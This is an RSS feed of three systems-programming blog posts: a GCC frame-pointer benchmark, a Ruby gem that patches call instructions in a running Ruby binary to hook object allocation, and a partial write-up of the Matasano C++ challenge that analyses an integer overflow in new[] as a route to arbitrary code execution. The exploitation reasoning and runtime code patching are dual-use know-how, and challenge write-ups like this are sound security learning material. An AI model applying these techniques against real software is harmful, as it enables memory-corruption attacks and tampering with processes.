<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>time to bleed by Joe Damato &#187; testing</title>
	<atom:link href="http://timetobleed.com/category/testing/feed/" rel="self" type="application/rss+xml" />
	<link>http://timetobleed.com</link>
	<description>technical ramblings from a wanna-be unix dinosaur</description>
	<lastBuildDate>Tue, 05 Jul 2011 13:00:09 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>GCC optimization flag makes your 64bit binary fatter and slower</title>
		<link>http://timetobleed.com/gcc-optimization-flag-makes-your-64bit-binary-fatter-and-slower/</link>
		<comments>http://timetobleed.com/gcc-optimization-flag-makes-your-64bit-binary-fatter-and-slower/#comments</comments>
		<pubDate>Tue, 20 Jul 2010 12:59:53 +0000</pubDate>
		<dc:creator>Joe Damato</dc:creator>
				<category><![CDATA[debugging]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[systems]]></category>
		<category><![CDATA[testing]]></category>
		<category><![CDATA[x86]]></category>

		<guid isPermaLink="false">http://timetobleed.com/?p=1909</guid>
		<description><![CDATA[If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter. The intention of this post is to highlight a subtle GCC optimization bug that leads to slower and larger code being generated than would have been generated without the optimization flag. UPDATED: Graphs are now 0 based on the y [...]]]></description>
			<content:encoded><![CDATA[<p><center><img src="http://timetobleed.com/images/large_bug.jpg" alt="" width="300" height="400" /></center><br />
If you enjoy this article, <a rel="alternate" type="application/rss+xml" href="http://feeds.feedburner.com/TimeToBleed">subscribe (via RSS or e-mail)</a> and <a href="http://twitter.com/joedamato">follow me on twitter.</a></p>
<p>The intention of this post is to highlight a subtle GCC optimization bug that leads to slower and larger code being generated than would have been generated without the optimization flag.</p>
<h2>UPDATED: Graphs are now 0 based on the y axis. Links in the tidbits section (below conclusion) for my ugly test harness and terminal session of the build of the test case in the bug report, objdump, and corresponding system information.</h2>
<h2>Hold the #gccfail tweets, son.</h2>
<p>Everyone fucks up. The point of this post is <em>not</em> to rag on GCC. If writing a C compiler was easy then every asshole with a keyboard would write one for fun.</p>
<h2>WARNING: THERE IS MATH, SCIENCE, AND GRAPHS BELOW.</h2>
<p>Watch yourself.</p>
<h2>The original bug report for <code>-fomit-frame-pointer</code>.</h2>
<p>I stumbled across a <a href="http://gcc.gnu.org/bugzilla/show_bug.cgi?id=44958">bug report for GCC</a> that was very interesting. It points out a very subtle bug that occurs when the <code>-fomit-frame-pointer</code> flag is passed to GCC. The bug report is for 32bit code, however after some testing I found that this bug <strong>also rears its head in 64bit code</strong>.</p>
<h2>What is <code>-fomit-frame-pointer</code> supposed to do?</h2>
<p>The <code>-fomit-frame-pointer</code> flag is intended to direct GCC to avoid saving and restoring the frame pointer (<code>%ebp</code> or <code>%rbp</code>). This is supposed to make function calls faster, since the function is doing less work each invocation. It should also make function code take fewer bytes since there are fewer instructions being executed.</p>
<p>A caveat of using <code>-fomit-frame-pointer</code> is that it <em>may</em> make <strong>debugging impossible</strong> on certain systems. To combat this on Linux, <code>.debug_frame</code> and <code>.eh_frame</code> sections are added to ELF binaries to assist in the stack unwinding process when the frame pointer is omitted.</p>
<h2>What is the bug?</h2>
<p>The bug is that when <code>-fomit-frame-pointer</code> is used, GCC erroneously uses the frame pointer register as a general purpose register <em>when a different register could be used instead</em>.</p>
<p><strong>wat.</strong></p>
<p>The amd64 and i386 ABIs<sup>1</sup> <sup>2</sup> specify a list of caller and callee saved registers.</p>
<ul>
<li>The frame pointer register is callee saved. That means that if a function is going to use the frame pointer register, it must save and restore the value in the register.</li>
<li>The test case provided in the bug report shows that other <em>caller</em> saved registers were available for use.</li>
<li>Had the function used a caller saved register instead, there would be <em>no need</em> for the additional save and restore instructions in the function.</li>
<li>Removing those instructions would take fewer bytes and execute faster.</li>
</ul>
<h2>What are the consequences?</h2>
<p>Let&#8217;s take a look at two potential pieces of code.</p>
<p>The first piece is the code that would be generated if <code>-fomit-frame-pointer</code> <strong>is not used</strong>:</p>
<pre class="prettyprint">test1:
        pushq %rbp       ; save frame pointer
        movq %rsp,%rbp   ; update frame pointer to the current stack pointer
           ; here is where your function would do work
        leave            ; restore the stack pointer and frame pointer
        ret              ; return</pre>
<p><strong>Size: 6 bytes</strong>.</p>
<p>The above assembly sequence uses the frame pointer.</p>
<p>Let&#8217;s take a look at the code that is generated by GCC when <code>-fomit-frame-pointer</code> is used:</p>
<pre class="prettyprint">        sub $0x8, %rsp    ; make room on the stack
        movq %rbp, (%rsp) ; store rbp on the stack
          ; here is where your function would modify and use %rbp as needed
        movq (%rsp), %rbp ; restore %rbp
        add $0x8, %rsp    ; get rid of the extra stack space
        ret               ; return</pre>
<p><strong>Size: 17 bytes</strong>.</p>
<p>The above assembly sequence is what is generated when GCC decides to use the frame pointer register as a general purpose register. Since it is callee saved, it must be saved before being modified and restored after being modified.</p>
<h2>So <code>-fomit-frame-pointer</code> makes your binary fatter, but does it make it slower?</h2>
<p>Only one way to find out: <strong>do science.</strong></p>
<p>I built a simple (and very ugly) testing harness to test the above pieces of code to determine which piece of code is faster. Before we get into the benchmark results, I want to tell you why my benchmark is <em>bullshit</em>.</p>
<p>Yes, <em>bullshit</em>.</p>
<p>You see, it makes me sad when people post benchmarks and neglect to tell others why their benchmark may be inaccurate. So, lemme start the trend.</p>
<p>This benchmark is useless because:</p>
<ul>
<li>Reading the CPU cycle counter is unreliable (more on this below the conclusion). I also tracked wall clock time, too.</li>
<li>I don&#8217;t have the ideal test environment. I ran this on bare metal hardware, and set the CPU affinity to keep the process pinned to a single CPU&#8230; <strong>BUT</strong></li>
<li><strong>I could have done better</strong> if I had pinned <code>init</code> to CPU0 (thereby forcing all children of init to be pinned to CPU0 &#8211; <strong>remember child processes inherit the affinity mask</strong>). I would have then had an entire CPU for nothing but my benchmark.</li>
<li><strong>I could have done better</strong> if I forced the CPU running my benchmark program to not handle any IRQs.</li>
<li><b>I only tested one version of GCC</b>: (Debian 4.3.2-1.1) 4.3.2</li>
<li><strong>I could have</strong> taken more samples.</li>
</ul>
<p>You can find more testing harness tidbits below the conclusion.</p>
<h2>Benchmark Results</h2>
<p>
<b>test 1</b> &#8212; Code sequence simulating using the  frame pointer.<br />
<b>test 2</b> &#8212; Code sequence simulating using the frame pointer as a general purpose register.
</p>
<h2>64bit results</h2>
<p><b><u>Using <code>-fomit-frame-pointer</code> is SLOWER (contrary to what you&#8217;d expect) than not using it!</u></b></p>
<table border="1" bordercolor="#000000" style="background-color:#ffffff" width="600" cellpadding="1" cellspacing="0">
<tr>
<td></td>
<td>cycles test 1</td>
<td>cycles test 2</td>
<td>microsecs test 1</td>
<td>microsecs test 2</td>
</tr>
<tr>
<td>mean</td>
<td>3514422987.92</td>
<td>4559685515.66</td>
<td>1882707.27</td>
<td>2442663.94</td>
</tr>
<tr>
<td>median</td>
<td>3507007423.5</td>
<td>4562511684.5</td>
<td>1878721.5</td>
<td>2444171.5</td>
</tr>
<tr>
<td>max</td>
<td>3922780211</td>
<td>4672066854</td>
<td>2101457</td>
<td>2502869</td>
</tr>
<tr>
<td>min</td>
<td>3502194976</td>
<td>4327782795</td>
<td>1876113</td>
<td>2318452</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>std dev</td>
<td>31927179.5632</td>
<td>15449507.8196</td>
<td>17103.7755</td>
<td>8275.49788</td>
</tr>
<tr>
<td>variance</td>
<td>1.02E+15</td>
<td>238687291867021</td>
<td>292539135.936</td>
<td>68483865.11835</td>
</tr>
</table>
<p></p>
<p>
<img src="http://timetobleed.com/images/64bit_cycles.png" alt="" />
</p>
<p>
<br />
<img src="http://timetobleed.com/images/64bit_microsecs.png" alt="" />
</p>
<p></p>
<h2>32bit results</h2>
<p><b><u>Using <code>-fomit-frame-pointer</code> is FASTER (as it should be) than not using it! The binary is still fatter, though.</u></b></p>
<table border="1" bordercolor="#000000" style="background-color:#ffffff" width="600" cellpadding="1" cellspacing="0">
<tr>
<td></td>
<td>cycles test 1</td>
<td>cycles test 2</td>
<td>microsecs test 1</td>
<td>microsecs test 2</td>
</tr>
<tr>
<td>mean</td>
<td>3502932799.49</td>
<td>3491263364.89</td>
<td>1876553.08</td>
<td>1870301.35</td>
</tr>
<tr>
<td>median</td>
<td>3501486586.5 </td>
<td>3492013955.5</td>
<td>1875778</td>
<td>1870702.5</td>
</tr>
<tr>
<td>max</td>
<td>3905163528</td>
<td>3731985243</td>
<td>2092032</td>
<td>1999259</td>
</tr>
<tr>
<td>min</td>
<td>3500916510</td>
<td>3408834436</td>
<td>1875472</td>
<td>1826144</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>std dev</td>
<td>10066939.1113</td>
<td>7992367.6913</td>
<td>5393.0412</td>
<td>4281.5466</td>
</tr>
<tr>
<td>variance</td>
<td>101343263071403</td>
<td>63877941312996.4</td>
<td>29084893.2588</td>
<td>18331640.9459</td>
</tr>
</table>
<p></p>
<p>
<img src="http://timetobleed.com/images/32bit_cycles.png" alt="" />
</p>
<p>
<br />
<img src="http://timetobleed.com/images/32bit_microsecs.png" alt="" />
</p>
<h2>Conclusion</h2>
<ul>
<li>GCC is a really complex piece of software; this bug is very subtle and may have existed for a while.</li>
<li>I&#8217;ve said this a few times, but knowing and understanding your system&#8217;s ABI is crucial for catching bugs like these.</li>
<li>Math and science are cool now, much like computers. You should use both.</li>
</ul>
<p>
Thanks for reading and don&#8217;t forget to <a rel="alternate" type="application/rss+xml" href="http://feeds.feedburner.com/TimeToBleed">subscribe (via RSS or e-mail)</a> and <a href="http://twitter.com/joedamato">follow me on twitter.</a></p>
<h2>Testing harness tidbits</h2>
<p>Each <strong>run</strong> of the benchmark executes either <code>test1</code> or <code>test2</code> (from above) 500,000,000 times. I did around 2500 runs for each test function.<br />
</p>
<p>
You can get the testing harness, a build script, and a test script here: <a href="http://gist.github.com/483524">http://gist.github.com/483524</a>
</p>
<p>You can look at the terminal session where I build the test from the original bug report on my system: <a href="http://gist.github.com/483494">http://gist.github.com/483494</a>
</p>
<p>
The code I used to read the CPU cycle counter looks like this:</p>
<pre class="prettyprint">static __inline__ unsigned long long rdtsc(void)
{
  unsigned long hi = 0, lo = 0;
  __asm__ __volatile__ ("lfence\n\trdtsc" : "=a"(lo), "=d"(hi));
  return ( (unsigned long long)lo)|( ((unsigned long long)hi)<<32 );
}</pre>
</p>
<p>
The <code>lfence</code> instruction is a serializing instruction that ensures that all load instructions which were issued before the <code>lfence</code> instruction have been executed before proceeding. I did this to make sure that the cycle counter was being read after all operations in the test functions were executed.<br />
<br />
The values returned by this function are misleading because CPU frequency may be scaled at any time. This is why I also measured wall clock time.<br />
</p>
<h2>References</h2>
<ol class="footnotes"><li id="footnote_0_1909" class="footnote"><a href="http://www.sco.com/developers/devspecs/abi386-4.pdf">http://www.sco.com/developers/devspecs/abi386-4.pdf</a></li><li id="footnote_1_1909" class="footnote"><a href="http://www.x86-64.org/documentation/abi.pdf ">http://www.x86-64.org/documentation/abi.pdf </a></li></ol>]]></content:encoded>
			<wfw:commentRss>http://timetobleed.com/gcc-optimization-flag-makes-your-64bit-binary-fatter-and-slower/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Rewrite your Ruby VM at runtime to hot patch useful features</title>
		<link>http://timetobleed.com/rewrite-your-ruby-vm-at-runtime-to-hot-patch-useful-features/</link>
		<comments>http://timetobleed.com/rewrite-your-ruby-vm-at-runtime-to-hot-patch-useful-features/#comments</comments>
		<pubDate>Mon, 23 Nov 2009 12:59:53 +0000</pubDate>
		<dc:creator>Joe Damato</dc:creator>
				<category><![CDATA[bugfix]]></category>
		<category><![CDATA[debugging]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[monitoring]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[ruby]]></category>
		<category><![CDATA[systems]]></category>
		<category><![CDATA[testing]]></category>
		<category><![CDATA[x86]]></category>
		<category><![CDATA[allocator]]></category>
		<category><![CDATA[debug]]></category>
		<category><![CDATA[garbage collection]]></category>
		<category><![CDATA[GC]]></category>
		<category><![CDATA[memory]]></category>
		<category><![CDATA[x86_64]]></category>

		<guid isPermaLink="false">http://timetobleed.com/?p=1253</guid>
		<description><![CDATA[If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter. Some notes before the blood starts flowin&#8217; CAUTION: What you are about to read is dangerous, non-portable, and (in most cases) stupid. The code and article below refer only to the x86_64 architecture. Grab some gauze. This is going to [...]]]></description>
			<content:encoded><![CDATA[<p><center><img src="http://timetobleed.com/images/tramp.png" alt="" width="400" height="300" /></center><br />
If you enjoy this article, <a rel="alternate" type="application/rss+xml" href="http://feeds.feedburner.com/TimeToBleed">subscribe (via RSS or e-mail)</a> and <a href="http://twitter.com/joedamato">follow me on twitter.</a></p>
<h2>Some notes before the blood starts flowin&#8217;</h2>
<ul>
<li><strong>CAUTION:</strong> What you are about to read is dangerous, non-portable, and (in most cases) stupid.</li>
<li>The code and article below refer only to the <strong>x86_64</strong> architecture.</li>
<li>Grab some gauze. This is going to get ugly.</li>
</ul>
<h2>TLDR</h2>
<p>This article shows off a Ruby gem which has the power to overwrite a Ruby binary <em>in memory</em> while <em>it is running</em> to allow your code to execute in place of internal VM functions. This is useful if you&#8217;d like to hook all object allocation functions to build a memory profiler.</p>
<h2>This gem is on GitHub</h2>
<p>Yes, it&#8217;s on GitHub: <a href="http://github.com/ice799/memprof">http://github.com/ice799/memprof</a>.</p>
<h2>I want a memory profiler for Ruby</h2>
<p>This whole science experiment started during <a href="http://rubyconf.org/">RubyConf</a> when <a href="http://twitter.com/tmm1">Aman</a> and I began brainstorming ways to build a memory profiling tool for Ruby.</p>
<p>The big problem in our minds was that for most tools we&#8217;d have to include patches to the Ruby VM. That process is <b>long and somewhat difficult</b>, so I started thinking about ways to do this without modifying the Ruby source code itself.</p>
<p> The memory profiler is <b>NOT DONE</b> just yet. I thought that the hack I wrote to let us build something without modifying Ruby source code was interesting enough that it warranted a blog post. So let&#8217;s get rolling.</p>
<h2>What is a trampoline?</h2>
<p>Let&#8217;s pretend you have 2 functions: <code>functionA()</code> and <code>functionB()</code>. Let&#8217;s assume that <code>functionA()</code> calls <code>functionB()</code>.</p>
<p>Now also imagine that you&#8217;d like to insert a piece of code to execute in between the call to <code>functionB()</code>. You can imagine inserting a piece of code that <i>diverts execution</i> elsewhere, creating a flow: <code>functionA()</code> &#8211;> <code>functionC()</code> &#8211;> <code>functionB()</code></p>
<p>You can accomplish this by <i>inserting a trampoline</i>.</p>
<p>A trampoline is a piece of code that program execution jumps into and then <i>bounces</i> out of and on to somewhere else<sup>1</sup>.</p>
<p>This hack relies on the use of multiple trampolines. We&#8217;ll see why shortly.</p>
<h2>Two different kinds of trampolines</h2>
<p>There are two different kinds of trampolines that I considered while writing this hack, let&#8217;s take a closer look at both.</p>
<p>
<h3>Caller-side trampoline</h3>
<p>A <i>caller-side</i> trampoline works by overwriting the <a href="http://en.wikipedia.org/wiki/Opcodes">opcodes</a> in the <i>.text</i> segment of the program in the calling function causing it to call a different function <i>at runtime</i>.</p>
</p>
<p>The <b>big pros</b> of this method are:
<ul>
<li>You aren&#8217;t overwriting any code, only the address operand of a <code>callq</code> instruction.</li>
<li>Since you are only changing an operand, you can hook any function. You don&#8217;t need to build custom trampolines for each function.</li>
</ul>
<p> This method also has some <b>big cons</b> too:
<ul>
<li>You&#8217;ll need to scan <i>the entire binary in memory</i> and find and <i>overwrite</i> all address operands of <code>callq</code>. This is problematic because if you overwrite any false-positives you might break your application.</li>
<li>You have to deal with the implications of <code>callq</code>, which can be painful as we&#8217;ll see soon.</li>
</ul>
<p><h3>Callee-side trampoline</h3>
<p>A <i>callee-side</i> trampoline works by overwriting the opcodes in the <i>.text</i> segment of the program in the called function, causing it to call another function immediately</p>
<p>The <b>big pro</b> of this method is:
<ul>
<li>You only need to overwrite code in <i>one</i> place and don&#8217;t need to worry about accidentally scribbling on bytes that you didn&#8217;t mean to.</li>
</ul>
<p> this method has some <b>big cons</b> too:
<ul>
<li>You&#8217;ll need to carefully construct your trampoline code to only overwrite as little of the function as possible (or some how restore opcodes), especially if you expect the original function to work as expected later.</li>
<li>You&#8217;ll need to special case each trampoline you build for different optimization levels of the binary you are hooking into.</ul>
<p>I went with a <i>caller-side</i> trampoline because I wanted to ensure that I can hook any function and not have to worry about different Ruby binaries causing problems when they are compiled with different optimization levels.</p>
<h2>The stage 1 trampoline</h2>
<p>To insert my trampolines I needed to <i>insert some binary into the process</i> and then overwrite <code>callq</code> instructions like this:</p>
<p><pre class="prettyprint">
  41150b:       e8 cc 4e 02 00         callq  4363dc [rb_newobj]
  411510:       48 89 45 f8             ....
</pre>
</p>
<p></p>
<p> In the above code snippet, the byte <code>e8</code> is the <code>callq</code> opcode and the bytes <code>cc 4e 02 00</code> are the distance to <code>rb_newobj</code> from the address of the next instruction, 0&#215;411510</p>
<p>All I need to do is change the 4 bytes following <code>e8</code> to equal the displacement between the next instruction, 0&#215;411510 in this case, and my trampoline.</p>
<p><b>Problem.</b></p>
<p>My first cut at this code lead me to an important realization: the <code>callq</code> instructions used expect a <i>32bit displacement</i> from the function I am calling and <i>not</i> absolute addresses. <b>But</b>, the 64bit address space is <i>very</i> large. The displacement between the code for the Ruby binary that lives in the <code>.text</code> segment is so far away from my Ruby gem that the displacement <b>cannot be represented with only 32bits</b>.</p>
<p><b>So what now?</b></p>
<p>Well, luckily <code>mmap</code> has a flag <code>MAP_32BIT</code> which maps a page in the first 2GB of the address space. If I map some code there, it should be well within the range of values whose displacement I can represent in 32bits.</p>
<p>So, why not map a <b>second trampoline</b> to that page which can contains code that can call an <i>absolute address</i>?</p>
<p>My stage 1 trampoline code looks something like this:</p>
<p>
<pre class="prettyprint">
  /* the struct below is just a sequence of bytes which represent the
    *  following bit of assembly code, including 3 nops for padding:
    *
    *  mov $address, %rbx
    *  callq *%rbx
    *  ret
    *  nop
    *  nop
    *  nop
    */
  struct tramp_tbl_entry ent = {
    .mov = {'\x48','\xbb'},
    .addr = (long long)&#038;error_tramp,
    .callq = {'\xff','\xd3'},
    .ret = '\xc3',
    .pad =  {'\x90','\x90','\x90'},
  };

  tramp_table = mmap(NULL, 4096, PROT_WRITE|PROT_READ|PROT_EXEC,
                                   MAP_32BIT|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
  if (tramp_table != MAP_FAILED) {
    for (; i < 4096/sizeof(struct tramp_tbl_entry); i ++ ) {
      memcpy(tramp_table + i, &#038;ent, sizeof(struct tramp_tbl_entry));
    }
  }
}
</pre>
<p>
<p>It <code>mmap</code>s a single page and writes a table of default trampolines (like a jump table) that all call an error trampoline by default. When a new trampoline is inserted, I just go to that entry in the table and insert the address that should be called.</p>
<p>To get around the displacement challenge described above, the addresses I insert into the stage 1 trampoline table are addresses for stage 2 trampolines.</p>
<h2>The stage 2 trampoline</h2>
<p>Setting up the stage 2 trampolines are pretty simple once the stage 1 trampoline table has been written to memory. All that needs to be done is update the address field in a free stage 1 trampoline to be the address of my stage 2 trampoline. These trampolines are written in C and live in my Ruby gem.</p>
<p>
<pre class="prettyprint">
static void
insert_tramp(char *trampee, void *tramp) {
  void *trampee_addr = find_symbol(trampee);
  int entry = tramp_size;
  tramp_table[tramp_size].addr = (long long)tramp;
  tramp_size++;
  update_image(entry, trampee_addr);
}
</pre>
</p>
<p>
<p>An example of a stage 2 trampoline for <code>rb_newobj</code> might be:</p>
<p>
<pre class="prettyprint">
static VALUE
newobj_tramp() {
  /* print the ruby source and line number where the allocation is occuring */
  printf("source = %s, line = %d\n", ruby_sourcefile, ruby_sourceline);

  /* call newobj like normal so the ruby app can continue */
  return rb_newobj();
}
</pre>
</p>
<h2>Programatically rewriting the Ruby binary in memory</h2>
<p>Overwriting the Ruby binary to cause my stage 1 trampolines to get hit is pretty simple, too. I can just scan the <code>.text</code> segment of the binary looking for bytes which look like <code>callq</code> instructions. Then, I can sanity check by reading the next 4 bytes which should be the displacement to the original function. Doing that sanity check should prevent false positives.</p>
<pre class="prettyprint">
static void
update_image(int entry, void *trampee_addr) {
  char *byte = text_segment;
  size_t count = 0;
  int fn_addr = 0;
  void *aligned_addr = NULL;

 /* check each byte in the .text segment */
  for(; count < text_segment_len; count++) {

    /* if it looks like a callq instruction... */
    if (*byte == '\xe8') {

      /* the next 4 bytes SHOULD BE the original displacement */
      fn_addr = *(int *)(byte+1);

      /* do a sanity check to make sure the next few bytes are an accurate displacement.
        * this helps to eliminate false positives.
        */
      if (trampee_addr - (void *)(byte+5) == fn_addr) {
        aligned_addr = (void*)(((long)byte+1)&#038;~(0xffff));

        /* mark the page in the .text segment as writable so it can be modified */
        mprotect(aligned_addr, (void *)byte+1 - aligned_addr + 10,
                       PROT_READ|PROT_WRITE|PROT_EXEC);

        /* calculate the new displacement and write it */
        *(int  *)(byte+1) = (uint32_t)((void *)(tramp_table + entry)
                                     - (void *)(byte + 5));

        /* disallow writing to this page of the .text segment again  */
        mprotect(aligned_addr, (((void *)byte+1) - aligned_addr) + 10,
                      PROT_READ|PROT_EXEC);
      }
    }
    byte++;
  }
}
</pre>
<p></p>
<h2>Sample output</h2>
<p>After requiring my ruby gem and running a test script which creates lots of objects, I see this output:</p>
<pre class="prettify">
...
source = test.rb, line = 8
source = test.rb, line = 8
source = test.rb, line = 8
source = test.rb, line = 8
source = test.rb, line = 8
source = test.rb, line = 8
source = test.rb, line = 8
...
</pre>
<p>
<p><b>Showing the file name and line number for each object getting allocated.</b> That should be a strong enough primitive to build a Ruby memory profiler without requiring end users to build a custom version of Ruby. It should also be possible to re-implement <a href="http://blog.evanweaver.com/articles/2007/04/28/bleak_house/">bleak_house</a> by using this gem (and maybe another trick or two).</p>
<p><b>Awesome.</b></p>
<h2>Conclusion</h2>
<ul>
<li>One step closer to building a memory profiler without requiring end users to find and use patches floating around the internet.</li>
<li>It is unclear whether cheap tricks like this are useful or harmful, but they are <b>fun</b> to write.</li>
<li>If you understand how your system works at an intimate level, nearly anything is possible. The work required to make it happen might be difficult though.</li>
</ul>
<p>
Thanks for reading and don't forget to <a rel="alternate" type="application/rss+xml" href="http://feeds.feedburner.com/TimeToBleed">subscribe (via RSS or e-mail)</a> and <a href="http://twitter.com/joedamato">follow me on twitter.</a></p>
<h2>References</h2>
<ol class="footnotes"><li id="footnote_0_1253" class="footnote"><a href="http://en.wikipedia.org/wiki/Trampoline_%28computers%29">http://en.wikipedia.org/wiki/Trampoline_(computers)</a></li></ol>]]></content:encoded>
			<wfw:commentRss>http://timetobleed.com/rewrite-your-ruby-vm-at-runtime-to-hot-patch-useful-features/feed/</wfw:commentRss>
		<slash:comments>22</slash:comments>
		</item>
		<item>
		<title>Defeating the Matasano C++ Challenge with ASLR enabled</title>
		<link>http://timetobleed.com/defeating-the-matasano-c-challenge-with-aslr-enabled/</link>
		<comments>http://timetobleed.com/defeating-the-matasano-c-challenge-with-aslr-enabled/#comments</comments>
		<pubDate>Fri, 16 Oct 2009 11:59:29 +0000</pubDate>
		<dc:creator>Joe Damato</dc:creator>
				<category><![CDATA[bugfix]]></category>
		<category><![CDATA[debugging]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[systems]]></category>
		<category><![CDATA[testing]]></category>
		<category><![CDATA[x86]]></category>
		<category><![CDATA[memory]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[x86_64]]></category>

		<guid isPermaLink="false">http://timetobleed.com/?p=1152</guid>
		<description><![CDATA[If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter. Important note I am NOT a security researcher (I kinda want to be though). As such, there are probably way better ways to do everything in this article. This article is just illustrating my thought process when cracking this challenge. [...]]]></description>
			<content:encoded><![CDATA[<p><center><img src="http://timetobleed.com/images/computer_bug.jpg"  alt="" width="400" height="300"/></center><br />

<p>If you enjoy this article, <a rel="alternate" type="application/rss+xml" href="http://feeds.feedburner.com/TimeToBleed">subscribe (via RSS or e-mail)</a> and <a href="http://twitter.com/joedamato">follow me on twitter.</a></p>
<h2>Important note</h2>
<p>I am <b>NOT</b> a security researcher (I kinda want to be though). As such, there are probably way better ways to do everything in this article. This article is just illustrating my thought process when cracking this challenge.</p>
<h2>The Challenge</h2>
<p>The <a href="http://chargen.matasano.com/chargen/2009/10/9/a-c-challenge.html">Matasano Security blog</a> recently posted an article titled <i>A C++ Challenge</i><sup>1</sup> which included a particularly ugly piece of C++ code that has a security vulnerability. The challenge is for the reader to find the vulnerability, use it execute arbitrary code, and submit the data to Matasano.</p>
<p>Sounds easy enough, let&#8217;s do this! <i>cue hacking music</i></p>
<h2>Making it harder</h2>
<p>Recent linux kernels have feature called Address Space Layout Randomization (ASLR) which can be set in <code>/proc/sys/kernel/randomize_va_space</code>. ASLR is a security feature which randomizes the start address of various parts of a process image. Doing this makes exploiting a security bug more difficult because the exploit cannot use any hard coded addresses.</p>
<p>The options you can set are:</p>
<ul>
<li>0 &#8211; ASLR off</li>
<li>1 &#8211; Randomize the addresses of the stack, mmap area, and VDSO page. <b>This is the default.</b></li>
<li>2 &#8211; Everything in option 1, but also randomize the <code>brk</code> area so the heap is randomized.</li>
</ul>
<p>Just for fun I decided to set it to <b>2</b> to make exploiting the challenge more difficult.</p>
<h2>Got the code, but now what?</h2>
<p>I decided to start attacking this problem by looking for a few common errors, in this order:</p>
<ol>
<li><code>strcpy()/strncpy()</code> bugs <b>No calls</b></li>
<li><code>memcpy()</code> bugs <b>A few calls</b></li>
<li>Off by one bugs <b>None obvious</b></li>
</ol>
<p>It turned out from a quick look that all calls to <code>memcpy()</code> included sane, hard-coded values. So, it had to be something more complex.</p>
<h2>Digging deeper &#8211; finding input streams the user can control</h2>
<p>Next, I decided to actually <b>read</b> the code and see what it was doing at a high level and what inputs could be controlled. Turns out that the program reads data from a file and uses the data from the file to determine how many objects to allocate.</p>
<p>Obviously, this portion of the code caught my interest so let&#8217;s take a quick look:</p>
<pre class="prettyprint">
/* ... */

fd.read(file_in_mem, MAX_FILE_SIZE-1);

/* ... */

struct _stream_hdr *s = (struct _stream_hdr *) file_in_mem;

if(s->num_of_streams >= INT_MAX / (int)sizeof(int)) {
    safe_count = MAX_STREAMS;
} else {
    safe_count = s->num_of_streams;
}

Obj *o = new Obj[safe_count];
</pre>
<p>
<p>OK, so clearly that <code>if</code> statement is suspect. At the <i>very least</i> it doesn&#8217;t check for negative values, so you could end up with <code>safe_count = -1</code> which might do something interesting when passed to the <code>new</code> operator. Moreover, it appears this <code>if</code> statement will allow values as large as 536870910 ([INT_MAX / sizeof(int)] &#8211; 1).</p>
<p>Maybe the exploit has something to do with values this <code>if</code> statement is allowing through?</p>
<h2>A closer look at the integer overflow in <code>new</code></h2>
<p>Let&#8217;s use GDB to take a closer look at what the compiler does before calling new. I&#8217;ve added a few comments in line to explain the assembly code:</p>
<pre class="prettyprint">
mov    %edx,%eax   ;  %edx and %eax store s->num_of_streams
add    %eax,%eax   ;  add %eax to itself (s->num_of_streams * 2)
add    %edx,%eax   ;  add  s->num_of_streams + %eax (s->num_of_streams*3)
shl    $0x2,%eax   ;  multiply (s->num_of_streams * 3) by 4  (s->num_of_streams * 12)
mov    %eax,(%esp) ;  move it into position to pass to new
call   0x8048a7c <_Znaj@plt> ; call new
</pre>
<p>
<p>The compiler has generated code to calculate: <code>s->num_of_streams * sizeof(Obj)</code>. <code>sizeof(Obj)</code> is 12 bytes. For large values of <code>s->num_of_streams</code> multiplying it by 12, causes an <b>integer overflow</b> and the value passed to new will actually be <i>less than</i> what was intended.</p>
<p>For my exploit, I ended up using the value 357913943. This value causes an overflow, because 357913943 * 12 is <i>greater than</i> the biggest possible value for an integer by 20. So the value passed to new is 20. Which is, of course, significantly less than what we actually wanted to allocate. Other people have written about integer overflow in <code>new</code> in other compilers<sup>2</sup> before.</p>
<p>Let&#8217;s see how this can be used to cause arbitrary code to execute. <b>Remember</b>, for arbitrary code execution to occur there <i>must</i> be a way to <i>cause the target program to write some data to a memory address that can be controlled</i>.</p>
<h2>Find the (possible) hand-off(s) to arbitrary code</h2>
<p>To find any hand-off locations, I looked for places where memory writes were occurring in the program. I found a few memory writes:</p>
<ul>
<li>2 calls to <code>memset()</code></li>
<li>2 calls to <code>memcpy()</code></li>
<li><code>parse_stream()</code> of <code>class Obj</code></li>
</ul>
<p>Unfortunately (from the attacker&#8217;s perspective) the calls to <code>memcpy()</code> and <code>memset()</code> <i>looked</i> pretty sane. The <code>parse_stream()</code> function caught my interest, though.</p>
<p>Take a look:</p>
<pre class="prettyprint">
class Obj {
    public:
    int parse_stream(int t, char *stream)
    {
      type = t;
      // ... do something with stream here ...
      return 0;
    }

    int length;
    int type;
/* ... */
</pre>
<p>
<p><b>REMEMBER:</b> In C++, member functions of <code>class</code>es have a <b>sekrit parameter</b> which is a pointer to the object the function is being called on. In the function itself, this parameter is accessed using <code>this</code>. So the line writing to the <code>type</code> variable is actually doing <code>this->type = t;</code> where <code>this</code> is supplied to the function <b>sektrily</b> by the compiler.</p>
<p><b>This is important</b> because this piece of code could be our hand-off! We need to find a way to control the value of <code>this</code> so we can cause a memory write to a location of our choice.</p>
